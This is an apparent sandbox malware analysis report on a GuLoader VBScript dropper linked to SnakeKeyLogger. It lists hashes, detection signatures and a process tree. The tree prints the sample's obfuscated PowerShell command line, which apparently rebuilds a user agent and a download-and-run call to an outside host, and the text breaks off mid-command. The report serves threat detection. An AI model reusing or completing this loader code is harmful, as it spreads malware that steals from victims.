Edit tour
Windows
Analysis Report
O1CZjzItH1.vbs
Overview
General Information
Sample name: | O1CZjzItH1.vbsrenamed because original name is a hash value |
Original sample name: | adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959.vbs |
Analysis ID: | 1540050 |
MD5: | 250e1218609ed0d1e84e24290a5c3759 |
SHA1: | cb11233eb647f9731ae643d959fa3f40a483f3aa |
SHA256: | adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959 |
Tags: | D3LabSnakeKeyLoggerSPAM-ITAvbsuser-JAMESWT_MHT |
Infos: | |
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1248 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\O1CZj zItH1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 4324 cmdline:
ping gorme zl_6777.67 77.6777.67 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 2228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Stelog raphy Boli gministeri elt Surter hvervet Po lenkas #>; $Genforeni ngerne='Br asilianske ';<#Decolo riser Quat rains dksm ands Renta belt #>;$S tvregne=$O rlos+$host .UI; funct ion Udgang stilladels ernes($Lup ulus){If ( $Stvregne) {$setaria ++;}$Reves t=$Velkoms tens74+$Lu pulus.'Len gth'-$seta ria; for( $Kropsvisi teret=4;$K ropsvisite ret -lt $R evest;$Kro psvisitere t+=5){$Spo ilage=$Kro psvisitere t;$Salvels esfuldest+ =$Lupulus[ $Kropsvisi teret];$Pr ototraitor ='Kronvild tjagterne' ;}$Salvels esfuldest; }function Skillelini ens($Knoth ead){ & ($Toile ttaskens) ($Knothead );}$Tastet ryk=Udgang stilladels ernes 'gut tM ndsoUn uzPoliiCan al I clvot aaDavi/ Pe n ';$Taste tryk+=Udga ngstillade lsernes 'Q uar5Skyd.m ine0Love S ki.(Li nWF ejliMul nF abrdudklo NanwF.ans a,a ProcNB ,geT,lie S tem1Udru0 Dr,.Roug0R aci;Phra O ffiWCensiR iddnNatu6O akl4Be i;N e.r FenaxO ver6Ea t4U r n;Nume U rinrGyptvF ili:sta,1 Eff3Dest1C lee.Disa0T red)Fi a H andG noneY ellcJustk Siso,rep/F rod2 Sto0H .ms1Stil0G est0 P.o1C ert0Wi t1B uri DyreFS elviDubbr G,ueH,mpf tr oUmorxL ,du/Defl1c onv3Post1N ws.Sikk0 Bog ';$Cel lerne=Udga ngstillade lsernes 'E mbrUO bys OppeQuarrE rog-surfA ukkgBro E ivsN forti gna ';$Kon struktivt= Udgangstil ladelserne s 'Gru.haf ,at ArttB depKachsHo o,:Flit/Be .a/ GamsBa tiyH lvnDe uteMa ipFi nu.Fl trTo haoBef./Sk osLQuacySp ecsActib t rgaSandd v ov. PaupSt r sS,anpSk ij ';$Krop svisiteret ndarbejde9 7=Udgangst illadelser nes 'Olde> Gang ';$To ilettasken s=Udgangst illadelser nes ' ympI .ree Sa.x Raf ';$Ly kkejgers=' Spendynr'; $Proconscr iptive='\U dviklingse gnes.sep'; Skillelini ens (Udgan gstilladel sernes ' n pa$Fuyeg C u le,acoNa ivbFinaAAk vaLTr,n:O. lltCytoAId eamFra B U d UUn,rRCh icSBlse=Oz on$ kreSka nNP lwvGla s: staA St PWordP La D AliASn. wt P.laU,f r+trau$fry npGnisr ,e noAppecDue lO.enenKge usF.rhC r nrOarliclu mp FleTswo iLym.vRef eETysk '); Skillelini ens (Udgan gstilladel sernes 'Ar be$Forbg P enlHandoMi nuBFackaLa sL Bil: U nmKgardOIn dod eneELa n k aresA skEK.ogrOm l.=Bajo$Kl pknarcoCr aiNSy gSCh ert PrerUn usUPr.lKPr int s aI e alvsammTAk ti.AnidsCh e,pThyml N nIOpe.TTr un(Hoo $sv inkUn.orCh ecO no pTi lfS F,rVSv inifadeS . ryiBeriTSt roeAntiR . elEnoncTsk ifN FerDFo rpa.ildRGi psBSan eDa mpj ForDMe laEJor 9Di si7Insi)St ar ');Skil leliniens (Udgangsti lladelsern es ' Nov[, ufonfjldE RovtEjen.S extshunkE Marr Genv .kki C,nCD i heBronP, kspoGadiIF rowNtndit, algMInf AE kspNVeneAB allg UngeF astr Gre]W a.r:U,co: molSApplE KogC ,unuA nteRReaniD m,iT CarYK rafp E.er nheoGardtL auroTahacC ivioNighLL ump Rang=O utb ,usk[ StaN A.hE